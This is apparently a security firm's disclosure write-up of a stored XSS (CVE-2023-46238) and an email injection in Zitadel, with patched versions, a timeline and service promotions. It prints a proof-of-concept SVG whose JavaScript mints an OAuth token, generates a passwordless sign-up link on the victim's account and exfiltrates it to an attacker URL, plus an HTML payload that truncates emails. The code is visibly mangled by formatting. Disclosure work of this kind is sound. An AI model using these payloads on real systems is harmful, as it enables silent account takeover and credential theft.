Bastion Security

Zitadel one click silent account takeover

Ethan Mckee-Harris discovered stored cross-site scripting and email injection which could lead to silent account takeover.

Talk to an expert

Introduction

Zitadel is a unified identity infrastructure built as an open-source project that helps engineers focus their time on business features. Zitadel supports B2B, B2C and M2M settings while it provides crucial turnkey features like a hosted login, passwordless and multifactor authentication, authorization, single sign-on, OpenID Connect, SAML, extensibility with code (actions), APIs for everything and much more.

The Vulnerability

During an engagement, Ethan McKee-Harris, with the aide of Michael Tsai and Jack Moran discovered stored Cross-Site Scripting (XSS) within Zitadel. When exploited, the vulnerability would give a malicious user the ability to conduct a silent account takeover with a single click payload. This issue has been classified as an 8.7 high on the CVSS 3.1 scale and a CVE issued under the following number: CVE-2023-46238.

Throughout the disclosure process, Zitadel have been helpful and responsive. They quickly triaged and looked to remediate the discovered vulnerabilities.

November 7, 2023

Vulnerability Discovery

While testing a deployed Zitadel instance, it was discovered that SVG was a supported file type for user avatars. While Zitadel’s primary dashboard routes feature a fairly restrictive Content Security Policy (CSP) it was discovered that the route uploaded assets are served from contains no CSP. Further to this, assets are not served with a content disposition header. This header instructs clients to download the image rather then serving it from within the context of the web application domain.

After conducting further research it was discovered that JavaScript executed from within the context of the web applications domain was able to request a new OAuth key for authentication in subsequent requests. ZX Security combined the ability to request auth tokens along with Zitadel’s support for creating passwordless logins to generate a new passwordless login sign up link on the victims account and exfiltrate the generated URL to a maliciously controlled URL.

The ability to send emails with almost arbitrary content to any email address using the Zitadel platform was also discovered. This functionality would be an ideal way to deliver the stored XSS link to unsuspecting victims using a trusted medium. Zitadel considers email injection to be a known N day vulnerability.

Proof of Concepts

Silent account takeover

The following JavaScript payload can be used to send a “Sign up to passwordless login” link to a user controlled URL allowing for account takeover.

_<_{?xml version}₌_{"1.0" standalone}₌_"no"?_>_<!_{DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"}_>_<_{svg version}₌_{"1.1" baseProfile}₌_{"full" xmlns}₌_{"http://www.w3.org/2000/svg"}_>_<_{script type}₌_{"text/javascript"}_>__var_{base_url}₌_{"http://localhost:8080";}__var_{oauth_client_id}₌_"..."__var_{exhil_url}₌_{"https://.../"}_var_code₌_"";_var_{access_token}₌_"";_function_{fetch_oauth_details}_{() {}_var_sent₌_0;_var_xhr₌_new_{XMLHttpRequest}_();_var_url₌_{base_url}₊_{"/oauth/v2/authorize?response_type=code&client_id="}₊_{oauth_client_id}₊_{"&state=T2drNGVZLlphLVhYU2NzUkRLYlpQSktwMlE1SGYtUnVMc0VEdGJYRlRwVXlV%3B61129da7-26c7-4341-95a5-c5c856e4826d&redirect_uri="}_{+encodeURIComponent}_{(base_url)}₊_{"%2Fui%2Fconsole%2Fauth%2Fcallback&scope=openid%20profile%20email&code_challenge=borY93w_wZ0jpywgeFd5bhl-lxmBFRst35FuoVEX-gI&code_challenge_method=S256&nonce=T2drNGVZLlphLVhYU2NzUkRLYlpQSktwMlE1SGYtUnVMc0VEdGJYRlRwVXlV"; xhr.}_open_{("GET", url); xhr.onreadystatechange}₌_(e)_=>_{_if₍_!_{sent) { code}₌_{xhr.responseURL.}_match_{(/=([^&]+)/)[0].}_slice_{(1); sent}₌_1;_{generate_oauth_token}_{(); } } xhr.}_send_{(); }}_function_{generate_oauth_token}_{() {}_var_sent₌_0;_var_xhr2₌_new_{XMLHttpRequest}_{(); xhr2.responseType}₌_'json';_var_{token_url}₌_{base_url}₊_{"/oauth/v2/token" xhr2.}_open_{("POST", token_url); xhr2.}_{setRequestHeader}_{("Content-type", "application/x-www-form-urlencoded"); xhr2.onreadystatechange}₌_(e)_=>_{_if₍_!_sent_&_amp;_&_{amp;xhr2.response}_!=null_{) { access_token}₌_{xhr2.response.access_token; sent}₌_1;_{generate_and_send_takeover_link}_{(); } } xhr2.}_send_{("grant_type=authorization_code&code="}₊_code₊_{"&redirect_uri="}_{+encodeURIComponent}_{(base_url)}₊_{"%2Fui%2Fconsole%2Fauth%2Fcallback&code_verifier=UjZjZFN5SFFSfjk0SllQUmZDT2tqOWRZYUR4M0o4ZnpZV3NIc2hWQ3dBZE9i&client_id="}₊_{oauth_client_id); }}_function_{generate_and_send_takeover_link}_{() {}_const_{password_http}₌_new_{XMLHttpRequest}_();_const_{url_two}₌_{base_url}₊_{'/zitadel.auth.v1.AuthService/AddMyPasswordlessLink'; password_http.}_open_{("POST", url_two); password_http.}_{setRequestHeader}_{('Content-type', 'application/grpc-web+proto'); password_http.}_{setRequestHeader}_{('Authorization', 'Bearer '}₊_{access_token); password_http.}_{setRequestHeader}_{('X-User-Agent', 'grpc-web-javascript/0.1'); password_http.}_{setRequestHeader}_{('X-Grpc-Web', '1'); password_http.onreadystatechange}₌_(e)_=>_{_if_{(password_http.readyState}₌₌₌_{3) {}_var_variable₌_{password_http.response;}__variable₌_variable._match_{("https?.*code=.{12}"); variable}₌_variable[0];_const_{outbound_http}₌_new_{XMLHttpRequest}_();_const_{url_three}₌_{exhil_url}₊_btoa_{(variable); outbound_http.}_open_{("GET", url_three); outbound_http.}_send_{(); outbound_http.onreadystatechange}₌_(e)_=>_{{ window.}_close_{() } } } password_http.}_send_{("\0\0\0\0\0"); }}_{fetch_oauth_details}_();_<_/script>_<_/svg>

This PoC could also be simplified to send the OAuth token to the malicious user rather then a passwordless sign up link.

Email injection

The following payload could be added into the “Family Name” field to remove the trailing email content:

_{</div></td></td></tbody><tbody style=display:none>}

Any content in the first name and content in the family name fields before this HTML would become the only content in the email.

Potential Impact

Complete account takeover.

How To Fix

Update to the latest version of Zitadel.

It has been patched in the following versions:

2.28.2
2.39.2

Vulnerability Disclosure Timeline

12/10/2023 - XSS disclosed to vendor
13/10/2023 - Vendor response
13/10/2023 - Further disclosed email injection
16/10/2023 - Vendor responds citing email injection is an ‘n day’ and requests PoC showing possible impact of XSS
19/10/2023 - Silent account takeover PoC sent
19/10/2023 - Vendor acknowledges PoC and states they will look into it
25/10/2023 - Vendor still assessing the impact of the issue and relevant mitigation
26/10/2023 - Vendor fixed, released advisory and issued CVE

‍

Service Development Manager

Government Agency

"Great service, clear, detailed and precise information on what our vulnerabilities were and what needs addressing. Couldn't have been easier to deal with and very professional."

Expert methods

We have the tools to pinpoint risks

Whether it’s hidden vulnerabilities or patterns you might miss, we help you stay one step ahead and make confident, informed decisions. Understand how our services can help your business uncover critical risks

Talk to an expert

Employee Cyber Training & Awareness

Your people are your first line of defence. Our cyber training builds awareness, sharpens instincts and turns everyday staff into assets.

Advisory

When clarity is critical and stakes are high, our advisory services deliver strategic, executive-level security expertise that empowers decision-making

Are you experiencing a security breach?

Incident Response

+64 4 281 7534